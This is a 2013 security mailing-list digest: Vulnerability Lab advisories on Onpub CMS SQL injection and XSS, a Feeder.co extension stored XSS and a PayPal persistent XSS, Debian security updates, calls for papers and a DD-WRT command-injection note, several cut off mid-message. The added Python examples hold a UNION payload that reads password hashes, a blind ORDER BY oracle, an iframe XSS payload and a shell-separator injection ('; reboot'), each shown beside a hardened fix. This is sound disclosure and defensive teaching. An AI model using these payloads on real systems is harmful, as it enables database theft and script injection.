Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities

2013-10-28 Thread Vulnerability Lab
Document Title:
===
Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1120


Release Date:
=
2013-10-26


Vulnerability Laboratory ID (VL-ID):

1120


Common Vulnerability Scoring System:

8.2


Product & Service Introduction:
===
Onpub is a web content management system (CMS) designed for those with 
intermediate to advanced web development skills 
who want to quickly set up custom, dynamic websites that are quick to update and 
easy to maintain. All Onpub content is 
stored in a fast and reliable MySQL database backend. There are many ways to 
customize and extend Onpub's default 
design and functionality via open-standard web development tools and techniques.

Onpub is ideal for those with no desire to implement a CMS from scratch who 
still need a custom, yet agile solution. 
Onpub tightly integrates many widely used third-party web apps and scripts 
into one coherent system to build further upon.

( Copy of the Vendor Homepage: http://onpub.com/ )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple remote web 
vulnerabilities in the Onpub v1.5 Content Management System web-application.


Vulnerability Disclosure Timeline:
==
2013-10-26:Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Onpub
Product: Onpub - Content Management System 1.4 Lite and 1.5


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details & Description:

1.1
Multiple remote SQL injection web vulnerabilities were detected in the official 
Onpub v1.4 and v1.5 Content Management System web application.
The vulnerabilities allow remote attackers to inject their own SQL commands 
without authorization and compromise the web application or the web server's DBMS.

The SQL injection vulnerabilities are located in the 
`websiteID`, `imageID`, `keywords`, `orderBy`, `order` and `articleID` values of 
the index.php file. 
Remote attackers are able to inject their own SQL commands via GET requests to 
compromise the database management system or the CMS web application.
The injection can be performed through the manage path via a GET request, or 
through the `articleID` value of index.php via a POST request. 
Note that `orderBy` and `order` end up in the ORDER BY clause, where a column 
name or sort direction cannot be bound as a query parameter; such values must 
be checked against an allow-list of identifiers in addition to using prepared 
statements for the ID and keyword values.
The severity of the remote SQL injection bugs is estimated as critical.

Exploitation of the remote SQL injection vulnerabilities requires no user 
interaction and no privileged web-application user account.
Successful exploitation results in compromise of the database management 
system and of the CMS or web application.


Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] websiteID
[+] imageID
[+] keywords
[+] orderBy
[+] order
[+] articleID
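The two injection shapes the advisory lists (a quoted value such as websiteID=-1' and an unquoted ORDER BY value such as orderBy) need different fixes, which the advisory does not spell out. The following is an added example, not Onpub's code: it uses an in-memory SQLite database with a constructed schema (the table and column names are assumptions) to show the vulnerable string-splicing pattern, a UNION payload built on the advisory's -1' prefix, a boolean oracle smuggled through orderBy, and the hardened version that binds websiteID as an integer parameter and allow-lists orderBy/order.

```python
import sqlite3

# Constructed stand-in for Onpub's MySQL backend. Table and column names are
# assumptions for this example, not taken from the Onpub source.
_SCHEMA = """
CREATE TABLE websites (ID INTEGER PRIMARY KEY, name TEXT, owner TEXT);
INSERT INTO websites VALUES (1, 'zeta site', 'alice');
INSERT INTO websites VALUES (2, 'alpha',     'bob');
CREATE TABLE users (ID INTEGER PRIMARY KEY, login TEXT, pwhash TEXT);
INSERT INTO users VALUES (1, 'admin', 'sha1$deadbeef');
"""


def _connect():
    con = sqlite3.connect(":memory:")
    con.executescript(_SCHEMA)
    return con


def list_websites_vulnerable(website_id, order_by="name", order="ASC"):
    """The pattern the advisory describes: GET values spliced into the SQL text."""
    sql = ("SELECT ID, name, owner FROM websites WHERE ID = '%s' "
           "ORDER BY %s %s" % (website_id, order_by, order))
    return _connect().execute(sql).fetchall()


ALLOWED_ORDER_BY = {"ID", "name", "owner"}
ALLOWED_ORDER = {"ASC", "DESC"}


def list_websites_hardened(website_id, order_by="name", order="ASC"):
    """websiteID is bound as a typed parameter; orderBy/order, which cannot be
    bound, are checked against an allow-list of identifiers before splicing."""
    try:
        wid = int(website_id)
    except (TypeError, ValueError):
        raise ValueError("websiteID must be an integer")
    order = order.upper()
    if order_by not in ALLOWED_ORDER_BY or order not in ALLOWED_ORDER:
        raise ValueError("orderBy/order not in allow-list")
    sql = ("SELECT ID, name, owner FROM websites WHERE ID = ? "
           "ORDER BY %s %s" % (order_by, order))
    return _connect().execute(sql, (wid,)).fetchall()


def hardened_rejects(website_id, order_by="name", order="ASC"):
    """True when the hardened query refuses the supplied GET values."""
    try:
        list_websites_hardened(website_id, order_by, order)
    except ValueError:
        return True
    return False


# Payload 1: the advisory's -1' prefix extended to a UNION that reads another
# table; the trailing comment swallows the ORDER BY the application appends.
UNION_PAYLOAD = "-1' UNION SELECT ID, login, pwhash FROM users -- "


def order_by_oracle(guess):
    """Payload 2: an orderBy value that leaks one bit per request. When the
    guessed first character of the stored hash is right the rows are sorted by
    name (row 2 comes first); otherwise by owner (row 1 comes first)."""
    return ("CASE WHEN (SELECT substr(pwhash,1,1) FROM users)='%s' "
            "THEN name ELSE owner END" % guess)


if __name__ == "__main__":
    print(list_websites_vulnerable(UNION_PAYLOAD))
    print(list_websites_vulnerable("1' OR '1'='1", order_by=order_by_oracle("s"))[0][0])
    print(hardened_rejects(UNION_PAYLOAD), hardened_rejects("1", order_by=order_by_oracle("s")))
```

The oracle payload is the point of the example: even after websiteID is parameterized, an orderBy value that is spliced into the query still lets an attacker sort on an arbitrary expression and read the database one comparison at a time, so an allow-list on the identifier is not optional.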



2.1
A client-side cross site scripting vulnerability was detected in the official 
Onpub v1.4 and v1.5 Content Management System web application.
The vulnerability allows remote attackers to manipulate 
web-application-to-browser requests (client-side).

The client-side cross site scripting vulnerability is located in the 
`page` parameter of the index.php file (manage module). 
Remote attackers can manipulate the `page` parameter of `index.php` 
via a GET request to compromise the client-side application context.

Successful exploitation of the client-side cross site scripting 
vulnerability results in session hijacking, client-side phishing, 
client-side unauthorized external redirects and client-side manipulation of the 
contact form module context.


Vulnerable Module(s):
[+] Manage

Vulnerable File(s):
[+] index.php

Vulnerable Parameter(s):
[+] page



Proof of Concept (PoC):
===
1.1
The sql injection web vulnerabilities can be exploited by remote attackers 
without privileged application user account and user interaction.
For demonstration or to reproduce ...

PoC:
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsite&websiteID=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&fullTextSearch=1&keywords=-1%27[SQL-INJECTION VULNERABILITY!]
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsites&orderBy=-1%27[SQL-INJECTION
 

Feeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability

2013-10-28 Thread Vulnerability Lab
Document Title:
===
Feeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability



Release Date:
=
2013-10-26


Vulnerability Laboratory ID (VL-ID):

1119


Common Vulnerability Scoring System:

3.8


Product & Service Introduction:
===
Feeder.co (www.feeder.co) is the simplest and prettiest way to follow your 
favorite feeds and sites. 
Feeder supports most RSS and Atom feeds on the web. Get a simple overview of 
your RSS and Atom feeds 
in the toolbar. A simple and pretty way of keeping track of your latest RSS and 
Atom feeds. 
The best RSS Feed Reader extension for Chrome. 

- Instantaneously see when new posts are added to one of your RSS and Atom feeds
- Easily subscribe to new RSS/Atom feeds by clicking the browser icon
- Intuitively manage your feeds
- Right click context-menus in popup-menu let you mark all as read, and other 
nifty shortcuts
- Export your feeds so you can import them on another computer and/or keep them 
as backups for safekeeping
- Customize your feeds by choosing how many posts to display, or changing the 
title
- Organize your feeds using folders and sorting with drag and drop
- Choose between three different themes: Dark, Mint or Light 
- Everything is contained within the browser so no other third-party sites are 
needed
- Notifications when feeds have been updated. Enable globally or on select feeds
- Supports both RSS and Atom feeds
- See when a page has any RSS or Atom feeds to subscribe to

(Copy of the Vendor Product Homepage: http://feeder.co )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a persistent web 
vulnerability in the Feeder.co RSS Feeds Chrome Addon.


Vulnerability Disclosure Timeline:
==
2013-10-26: Researcher Notification & Coordination (Ateeq Khan)


Discovery Status:
=
Published


Affected Product(s):

Feeder.co
Product: RSS Feeder - Chrome Browser Addon 5.2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent script code injection vulnerability has been detected in the official 
feeder.co RSS browser extension.
The vulnerability allows remote attackers to inject script code that the 
extension stores and later executes in the user's browser (persistent).

The vulnerability affects the main feed input field: because the extension does 
not perform input sanitization properly, 
it is possible to inject persistent script code through the folder name input 
field, and that code is executed 
when the victim tries to delete the malicious entry. 

It is possible to inject malicious script code into the folder `Name` field 
of the feeds while adding a new entry. 
The code execution happens when a user tries to delete the injected entries. 
The affected source code with the injected payload 
is given below for reference:

<div class="pui-confirm-text">Delete "<iframe onload="prompt(2)" src="http://evolution-sec.com">script?</iframe>"</div>

It is also possible to inject malicious code via a remote URL, simply by 
adding a new RSS feed from a third-party remote website. 
In this case, the `Title` parameter is vulnerable.

Feeds can also be imported from and exported to a file, which makes 
this attack vector remotely exploitable through 
that route as well.

This vulnerability affects all current feeder.co users who are using the RSS 
browser extension for PC. iOS and 
Android users may also be affected. 

Successful exploitation of the persistent cross site scripting web 
vulnerability results in persistent client-side phishing, 
persistent client-side unauthorized external redirects and persistent 
manipulation of the module context.


Vulnerable Module(s):
[+] RSS Feeds

Vulnerable Sections(s):
[+] Add Feed (Title parameter)
[+] Add Folder Name (Name parameter)
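The advisory's two vectors (a feed title fetched from a remote URL and a folder name typed by the user) end in the same sink: stored text concatenated into the delete-confirmation markup. The following is an added example, not the extension's code: it parses a constructed RSS document whose first item title carries an iframe payload (placeholder host names, not the advisory's), renders the confirm dialog the vulnerable way and the hardened way, and uses the standard-library HTML parser to show which tags a browser would actually see in each.

```python
import html
from html.parser import HTMLParser
import xml.etree.ElementTree as ET

# Constructed RSS document; the first item title carries the kind of payload the
# advisory describes. Host names are placeholders, not the advisory's.
SAMPLE_RSS = b"""<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel><title>Constructed feed</title>
<item><title>&lt;iframe onload="prompt(2)" src="http://example.invalid/"&gt;&lt;/iframe&gt;</title>
<link>http://example.invalid/1</link></item>
<item><title>Benign post &amp; nothing else</title><link>http://example.invalid/2</link></item>
</channel></rss>"""


def feed_item_titles(rss_bytes):
    """Titles as a feed reader stores them: XML entities already decoded, so the
    first title is literally '<iframe onload=...>' once it reaches the UI."""
    root = ET.fromstring(rss_bytes)
    return [item.findtext("title", default="") for item in root.iter("item")]


def confirm_markup_vulnerable(title):
    """The pattern in the advisory's snippet: stored title spliced into dialog HTML."""
    return '<div class="pui-confirm-text">Delete "%s"?</div>' % title


def confirm_markup_hardened(title):
    """Same dialog with the title HTML-escaped at the output boundary, which is
    what assigning it via textContent instead of innerHTML achieves in a browser."""
    return '<div class="pui-confirm-text">Delete "%s"?</div>' % html.escape(title, quote=True)


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(rendered):
    """Start tags a browser would parse out of the rendered dialog markup."""
    parser = _TagCollector()
    parser.feed(rendered)
    return parser.tags


if __name__ == "__main__":
    for title in feed_item_titles(SAMPLE_RSS):
        print(tags_in(confirm_markup_vulnerable(title)), tags_in(confirm_markup_hardened(title)))
```

Escaping at the point where text becomes markup, rather than filtering at the input field, is what closes all three vectors at once (typed folder name, remote feed title, and an imported feeds file), because every one of them stores the same untrusted string and renders it through the same dialog.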


Proof of Concept (PoC):
===
The persistent script code injection vulnerability can be exploited by remote 
attackers without a web-application user account and 
with medium user interaction. For demonstration or to reproduce ...


To reproduce the proof of concept, the researcher used multiple ways including 
importing feeds from a remote URL and adding payloads manually.

Including payloads from remote URL:

1. Add a new feed entry in the browser extension with the following POC URL 
https://groups.google.com/forum/feed/evosec/msgs/rss.xml?num=15
2. You should now see the injected entries in your feeds. 
3. Try to delete the newly included entry feed 
4. You should see the code being 

Paypal Inc Bug Bounty #104 - Persistent Exception Vulnerability

2013-10-28 Thread Vulnerability Lab
Document Title:
===
Paypal Inc Bug Bounty #104 - Persistent Exception Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1038

PayPal Security UID: gJ1127yy


Release Date:
=
2013-10-26


Vulnerability Laboratory ID (VL-ID):

1038


Common Vulnerability Scoring System:

4.3


Product & Service Introduction:
===
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account 
or by a credit card at the payer's choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account 
after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a 
purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will 
default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 
1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding 
hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master 
Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other 
funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, 
establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, 
auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to 
the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the 
recipient, the amount sent and the recipient's account 
type. In addition, eBay purchases made by credit card through PayPal may incur 
extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its 
corporate headquarters are in San Jose, California, United 
States at eBay's North First Street satellite office campus. The company also 
has significant operations in Omaha, Nebraska, Scottsdale, 
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow 
(near Berlin) and Tel Aviv. As of July 2007, across 
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), 
China's bankcard association, to allow Chinese consumers 
to use PayPal to shop online. PayPal is planning to expand its workforce in Asia 
to 2,000 by the end of the year 2010.
Between December 4 and 9, 2010, PayPal services were attacked in a series of 
denial-of-service attacks organized by Anonymous in retaliation 
for PayPal's decision to freeze the account of WikiLeaks, citing terms of use 
violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a persistent input 
validation vulnerability in the official PayPal Inc (Core & API) Shipping 
Application.


Vulnerability Disclosure Timeline:
==
2013-07-31: Researcher Notification  Coordination (Benjamin Kunz Mejri)
2013-08-01: Vendor Notification (PayPal Site Security Team - Bug Bounty 
Program)
2013-09-26: Vendor Response/Feedback (PayPal Site Security Team - Bug 
Bounty Program)
2013-10-25: Vendor Fix/Patch (PayPal Site Developer Team)
2013-10-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

PayPal Inc
Product: Shipping & MOS Application - API 2013 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent input validation web vulnerability was detected in the official 
PayPal Inc (Core & API) Shipping web application.
The vulnerability allows a remote attacker to inject malicious script code 
on the application side with a persistent attack vector. 

The vulnerability is located in the service-unavailable exception of the Get 
Started with PayPal module. Remote attackers can request 
the Get Started service with an 

[SECURITY] [DSA 2785-1] chromium-browser security update

2013-10-28 Thread Michael Gilbert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2785-1   secur...@debian.org
http://www.debian.org/security/   Michael Gilbert
October 26, 2013   http://www.debian.org/security/faq
- -

Package: chromium-browser
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-2906 CVE-2013-2907 CVE-2013-2908 CVE-2013-2909 
 CVE-2013-2910 CVE-2013-2911 CVE-2013-2912 CVE-2013-2913
 CVE-2013-2915 CVE-2013-2916 CVE-2013-2917 CVE-2013-2918
 CVE-2013-2919 CVE-2013-2920 CVE-2013-2921 CVE-2013-2922
 CVE-2013-2923 CVE-2013-2924 CVE-2013-2925 CVE-2013-2926
 CVE-2013-2927 CVE-2013-2928

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2013-2906

Atte Kettunen of OUSPG discovered race conditions in Web Audio.

CVE-2013-2907

Boris Zbarsky discovered an out-of-bounds read in window.prototype.

CVE-2013-2908

Chamal de Silva discovered an address bar spoofing issue.

CVE-2013-2909

Atte Kettunen of OUSPG discovered a use-after-free issue in
inline-block.

CVE-2013-2910

Byoungyoung Lee of the Georgia Tech Information Security Center
discovered a use-after-free issue in Web Audio.

CVE-2013-2911

Atte Kettunen of OUSPG discovered a use-after-free in Blink's XSLT
handling.

CVE-2013-2912

Chamal de Silva and 41.w4r10r(at)garage4hackers.com discovered a
use-after-free issue in the Pepper Plug-in API.

CVE-2013-2913

cloudfuzzer discovered a use-after-free issue in Blink's XML
document parsing.

CVE-2013-2915

Wander Groeneveld discovered an address bar spoofing issue.

CVE-2013-2916

Masato Kinugawa discovered an address bar spoofing issue.

CVE-2013-2917

Byoungyoung Lee and Tielei Wang discovered an out-of-bounds read
issue in Web Audio.

CVE-2013-2918

Byoungyoung Lee discovered an out-of-bounds read in Blink's DOM
implementation.

CVE-2013-2919

Adam Haile of Concrete Data discovered a memory corruption issue
in the V8 javascript library.

CVE-2013-2920

Atte Kettunen of OUSPG discovered an out-of-bounds read in URL
host resolving.

CVE-2013-2921

Byoungyoung Lee and Tielei Wang discovered a use-after-free issue
in resource loading.

CVE-2013-2922

Jon Butler discovered a use-after-free issue in Blink's HTML
template element implementation.

CVE-2013-2924

A use-after-free issue was discovered in the International
Components for Unicode (ICU) library. 

CVE-2013-2925

Atte Kettunen of OUSPG discovered a use-after-free issue in Blink's
XML HTTP request implementation.

CVE-2013-2926

cloudfuzzer discovered a use-after-free issue in the list indenting
implementation.

CVE-2013-2927

cloudfuzzer discovered a use-after-free issue in the HTML form
submission implementation. 

CVE-2013-2923 and CVE-2013-2928

The chrome 30 development team found various issues from internal
fuzzing, audits, and other studies. 

For the stable distribution (wheezy), these problems have been fixed in
version 30.0.1599.101-1~deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 30.0.1599.101-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)

iQQcBAEBCgAGBQJSWwMrAAoJELjWss0C1vRzix8f/3u/oOLmR1/70gZliS/mbGYh
MKCxR0BgS85CENIYujIlW1k+urYEnfjZkpDqzh41ExpgCos6NcncNtoP3apz2UDX
6g/qh/cbUC7eXUfXW/Z2/XFam9RtNoa9helhpuZ5RvyZ+A836CkEzCwigFOpgOMJ
e/sPjgxwSpz3nlYR3VPG6dRMSOx0jFeickNZTHPm3DmuhmF3dvnKWKlmTvJ1LtC9
/GFHmdGckoVEVNMHD5v8FAlCwoRNAZ/WK/7h4Ro9/mc8Z9qJYB/7dUveiIAO73Qj
JiOxI1hHjcCtsm3lUBmKe5/WDcTWeLz5IRTLfOMrxp0zZfYp858y2/tDDnqeNFn2
EVaKMsOZytVpF4ercGoszruDiKdnX8Uq6Ng44SssQf37FNDUOo9nrBghLyWnl8Kz
07MxAHzz4N8uy2UyjVTmzIYSP0s9ccRH6KgPxTfbWBdyb8Q/inKEU/7/XbBHKZSm
Cqfh5jqIMcIuupg8wT20up4FvtcWSHrw2JmZxEQEsBn/wbNF+b67VNniUDFWgua7
LUmCmhJeZv+Zhjc4cHVliI5cGP03m4C/25dUplR9rofZ8VEG0vkPj6J3nyaEnCiS
NY6Z3AfmntvRS50Vbrl+6v0BLjSjXeWPt2nRneQ+bEaCM8PX7wIPYBCczVxzzZrH
6nw7ngqrOCmwiuz0+2O777wmanWCAFimpaVwGNBqNxdfcywk16unIA+YU2AbHLeq
anevGnQBbjyi9joO9gN67CCIBBVqmZ93DQHIUyjPNpuixtz9gzkunVdt9r+8OM3l
Nom/ttW6foZ9NlLbg5tbYHtTrpZ/t8ng6it4AHmGM/QqGQmXZdYanNZ03ok3IFE7
lJNKGZb/TgwQms3dd3hXheOx8D3p8MclSyo81iaF5KAhsZ6bRVHM/u8hKtFZ8FIL
nF3ppA0Y/HUZS1W9UweOJT0Vlxt8PNHn8YTHEhYUXX/HX5uDIdVVS4XSWCTxVYlu

[SECURITY] [DSA 2787-1] roundcube security update

2013-10-28 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2787-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
October 27, 2013   http://www.debian.org/security/faq
- -

Package: roundcube
Vulnerability  : design error
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-6172
Debian Bug : 727668

It was discovered that roundcube, a skinnable AJAX based webmail
solution for IMAP servers, does not properly sanitize the _session
parameter in steps/utils/save_pref.inc during saving preferences. The
vulnerability can be exploited to overwrite configuration settings and
subsequently allowing random file access, manipulated SQL queries and
even code execution.

roundcube in the oldstable distribution (squeeze) is not affected by
this problem.

For the stable distribution (wheezy), this problem has been fixed in
version 0.7.2-9+deb7u1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your roundcube packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.15 (GNU/Linux)

iQIcBAEBCgAGBQJSbNQmAAoJEAVMuPMTQ89E6zYP/0tlZhlEgadu7xvTauny/zim
RV2WCJFLmRMCGZYhCiOJ2ND50fAnn62CdO+vnWN3JH5FH0KIngLmtGfrq+EPjLwj
rFPGMPKRDZRag8oV3SeKbsHlrcMHS5H/B9GhILst3+32pbwoBE7aH5+wTMYHshsF
TK0whlv73RZge6njPfzqvdkSoIgCLYx4Mc+pXP/pC+wOaSiD/gMjKBh51DoOwpnB
r7rfs7wmy4Ke1Ljsw35LceX64kCP8YC9d7FUPZc8SxUKEk3eojrhnSzpDUBt+Pvl
/S8nAbCbbrosh464szwXL4w6gcZIDDJgvy3u3aTn+XvRCoK6cr8RrdMbBQibR1Xb
9hCdieOs0pkNbBI4yE6bivztAolHlfAwvsgFPcMv3fM26gAsSOC8SRrzRqQrqqqk
1jfUqJETE+W0FkjmZa4W6JiDm78ZP4DNFQCrITRaealMgo2dh2uKua/4PmaBwjJ/
/lrukur5D6mCcLxFEpRA9TwDYVcvWE3cCVL9WhaMBNRJWiuKuaamOujO7jPtzga8
uJZWGKQNTd4rB6WHN4uN2wqltPH3lOIxvOd+2Uu9P9mDwQkgfrQ0s/hwjB3dpPWO
vNqHSeK2j8RZPDD4reulRFC4vEbI3MCXOUcyc+JqgI9Pa61Y0qrM6PwWyoPTDROr
PGySE+o+FGBjlugiGG51
=CNJm
-END PGP SIGNATURE-



Call for Papers, 2014 Symposium on Cryptography and Authentication (SCA2014) , Suzhou, China

2013-10-28 Thread 2014 Symposium on Cryptography and Authentication (SCA2014)
Call for Papers
2014 Symposium on Cryptography and Authentication (SCA2014)
Submission Due: Nov. 27, 2013
Conference: March 10-12, 2014

Dear Colleagues,

We would like to cordially invite you to submit or recommend papers to the 2014 Symposium on Cryptography and Authentication (SCA2014). The conference will be held from March 10 to 12, 2014 in Suzhou, China, and will bring together leading researchers, engineers and scientists in the domain of interest from around the world. More detailed information can be found at www.engii.org/workshop/CIS2014March.

Related Topics (more can be found on our website)
• Anti-Virus and Anti-Worms
• Key Management and Key Recovery
• Database Security
• Language-based Security
• Distributed Systems Security
• Security Evaluation
• Electronic Commerce Security
• Security for Mobile Computing
• Fraud Control
• Security Models
• Information Security Engineering
• System Security
• Information Privacy
• Signature and Key Agreement Protocol

Technical Program Committee
• Prof. Fagen Li, University of Electronic Science and Technology of China
• Prof. Xiaochun Cheng, Middlesex University
• Prof. Vic Grout, Glyndwr University
• Prof. Giannis F. Marias, Athens University of Economics and Business
• Prof. Stavros D. Nikolopoulos, University of Ioannina

Publication and Presentation
All accepted papers will be published in the Journal of Computer and Communications (ISSN: 2327-5219), a peer-reviewed open access journal that can ensure the widest dissemination of your published work. If you want to present your research results but do not wish to publish a paper, you may simply submit an abstract to our registration system.

Yours sincerely,
SCA Organizing Committee
Email: c...@engii.org
Tel: +86-132 6470 2230


[CVE-2012-6297] DD-WRT v24-sp2 Command Injection

2013-10-28 Thread Craig Young
Unfortunately command injections like the NETGEAR one Zachary Cutlip
and I both came across are all too common in embedded systems.

Similar to NETGEAR and Linksys having commands injected when running
ping, I have also noticed that DD-WRT v24-sp2 is prone to command
injection from specially crafted configuration values containing shell
meta-characters.  A remote attacker can potentially use CSRF from an
authenticated client to remotely execute commands on the router as the
root user.  This is also an easy way to DoS a system since you could
potentially force it into a reboot loop.

I reported this in the project's bug tracker almost a year ago but it
doesn't look like this is actively maintained so I figured I may as
well share with the list now in case anyone is running this firmware.
This is tracked as CVE-2012-6297.

There are a lot of consumer routers with these types of issues
(working with several vendors on this stuff at the moment) so I have
provided this list of generic tips for keeping consumer/SOHO routers
secure: 
http://www.tripwire.com/state-of-security/vulnerability-management/five-tips-securing-soho-routers/

I would also love to hear what other suggestions people have towards
minimizing the risk of someone popping a shell on your router.

Regards,
Craig
http://secur3.us/pub_key.asc
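The message above describes configuration values with shell metacharacters being interpolated into commands run as root. The following is an added example, not DD-WRT code or Craig Young's: it shows, in Python, why a value such as "8.8.8.8; reboot" turns one ping into two commands when the string is handed to a shell, and the two-part fix (a strict allow-list on the value, and passing the command as an argument vector so no shell parses it). The hostname pattern and the ping invocation are assumptions for the example; each firmware configuration field needs its own rule.

```python
import re
import shlex

# Allow-list for a hostname or IPv4 literal used as a ping target. This is an
# assumption for the example: the point is to accept a closed set of characters
# rather than to deny-list ; | & ` $( and friends.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def is_safe_host(value):
    """True only for a plain hostname/IPv4 literal (no whitespace, quotes or
    shell metacharacters can get through this pattern)."""
    return bool(_HOST_RE.match(value))


def ping_command_vulnerable(host):
    """Shell command line built by string interpolation, the firmware pattern
    the message describes; running it through system()/popen() hands the
    whole string to /bin/sh."""
    return "ping -c 1 %s" % host


def split_shell_commands(cmdline):
    """Tokenise the string the way a POSIX shell would and split it at command
    separators, so the effect of injected metacharacters is visible without
    actually executing anything."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "|", "||", "&", "&&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def ping_argv(host):
    """Hardened form: validate, then build an argument vector for
    subprocess.run(argv) (no shell=True), so the value is only ever one argv
    element and can never become a second command."""
    if not is_safe_host(host):
        raise ValueError("refusing unsafe ping target: %r" % host)
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    print(split_shell_commands(ping_command_vulnerable("8.8.8.8; reboot")))
    print(ping_argv("8.8.8.8"))
```

The reboot-loop denial of service mentioned in the message follows directly from the first print: a persisted configuration value that expands to a second command is re-executed every time the firmware re-reads that setting at boot.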


Call for Papers, 2014 Symposium on Protocols and Rules for Security (SPRS2014)

2013-10-28 Thread 2014 Symposium on Protocols and Rules for Security (SPRS2014)
2014 Symposium on Protocols and Rules for Security (SPRS2014) Call for Papers

Dear Colleagues,

We would like to cordially invite you to submit or recommend papers to the 2014 Symposium on Protocols and Rules for Security (SPRS2014). The conference will be held from March 10 to 12, 2014 in Suzhou, China, and will bring together leading researchers, engineers and scientists in the domain of interest from around the world. More detailed information can be found at www.engii.org/workshop/CIS2014March.

Topics
• Access Control
• Anti-Virus and Anti-Worms
• Authentication and Authorization
• Biometric Security
• Cryptography
• Data and System Integrity
• Database Security
• Distributed Systems Security
• Electronic Commerce Security
• Intrusion Detection
• Key Management and Key Recovery
• Language-based Security
• Network Security
• Operating System Security
• Risk Evaluation and Security Certification
• Security Evaluation
• Security for Mobile Computing

Important Dates
Submission Due: Nov. 27, 2013
Conference: March 10-12, 2014

Technical Program Committee
• Prof. Fagen Li, University of Electronic Science and Technology of China
• Prof. Xiaochun Cheng, Middlesex University
• Prof. Vic Grout, Glyndwr University
• Prof. Giannis F. Marias, Athens University of Economics and Business
• Prof. Stavros D. Nikolopoulos, University of Ioannina

Publication and Presentation
All accepted papers will be published in the Journal of Computer and Communications (ISSN: 2327-5219), a peer-reviewed open access journal that can ensure the widest dissemination of your published work. To be considered for an oral presentation, you can also submit your abstract to our submission system.

Contact Us
Email: c...@engii.org
Tel: +86-132 6470 2230


[SECURITY] [DSA 2786-1] icu security update

2013-10-28 Thread Michael Gilbert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2786-1   secur...@debian.org
http://www.debian.org/security/   Michael Gilbert
October 27, 2013   http://www.debian.org/security/faq
- -

Package: icu
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-0900 CVE-2013-2924
Debian Bug : 702346 726477

The Google Chrome Security Team discovered two issues (a race condition
and a use-after-free issue) in the International Components for Unicode
(ICU) library.

